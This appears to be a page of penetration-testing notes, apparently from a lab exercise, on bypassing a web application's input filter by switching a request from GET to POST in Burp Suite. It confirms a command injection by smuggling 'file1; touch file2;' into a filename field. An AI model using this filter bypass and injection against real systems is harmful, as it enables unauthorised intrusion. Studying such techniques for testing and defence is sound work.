INSECURE CODING

insecure coding errors are made during the development of the web application. this is where the web application doesn't cover all HTTP methods in certain functionalities. it is commonly found in security filters that detect malicious requests

#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port}
 input field: {arbitraryValue};
 output: Malicious Request Denied!
 * semi-colon is used to test the webapp's security filtering mechanism
 
#intercept & change the request method
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 input field: {arbitraryValue};
 
BURP > Proxy
 Request
  ...
  POST /index.php HTTP/1.1               //changed from GET to POST
  Host: 94.237.54.116:31220
  Referer: http://94.237.54.116:31220/index.php
  Content-Type: application/x-www-form-urlencoded

  filename=test2%3B
  
  * changing the HTTP Request may bypass the security filter
   
#confirm bypass through cmd injection vulnerability
BURP > Proxy > Change Request Method
 input field: file1; touch file2;
 
 Request
  ...
  POST /index.php HTTP/1.1               //changed from GET to POST
  POST /index.php HTTP/1.1
  Host: 94.237.54.116:31220
  Referer: http://94.237.54.116:31220/index.php
  Content-Type: application/x-www-form-urlencoded

  filename=file1%3B+touch+file2%3B
  
  * forward the modified request as many times as necessary

PreviousINSECURE CONFIGURATION NextSESSION ATTACKS

Last updated 6 months ago